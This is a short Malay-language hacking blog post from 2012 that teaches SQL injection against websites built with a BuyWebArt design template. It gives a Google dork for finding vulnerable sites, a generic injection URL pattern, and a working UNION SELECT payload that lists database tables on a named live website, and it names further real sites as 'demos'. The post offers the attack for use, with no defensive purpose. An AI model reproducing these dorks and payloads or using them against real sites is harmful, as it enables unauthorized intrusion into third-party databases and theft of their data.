Friday, 17 February 2012

BuyWebArt - SQLi Vulnerability



Assalamualaikum dan salam sejahtera.huhu tak boleh tidur la pula.jom belajar lagi?

1. Cari website target guna dork :

inurl:php?id= "graphic web design by BuyWebArt"

2. Buka web pilihan dan SQLI seperti dibawah :
Contoh : 

http://target.com/path/XXX.php?id=X&id=[SQLI DI SINI]

-----
Petunjuk-------
XXX  = nama page
X  = ID page
-----------------------

4. Live Demo :
http://www.mudracard.com/send-gift-cards.php?id=8

Contoh (Mencari tables) :

http://www.mudracard.com/send-gift-cards.php?id=-8+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()-- 

----------Petunjuk-----------
HIJAU = LINK VULN
MERAH = SQLI
--------------------------------

Other demo :
  • http://synergy-pune.com/page.php?id=german
  • http://www.youthejournalist.com/article.php?aid=3649&sid=19

Credit to Infamous from 1337day.com

Itu saja...
Assalamualaikum~~
Item Reviewed: BuyWebArt - SQLi Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com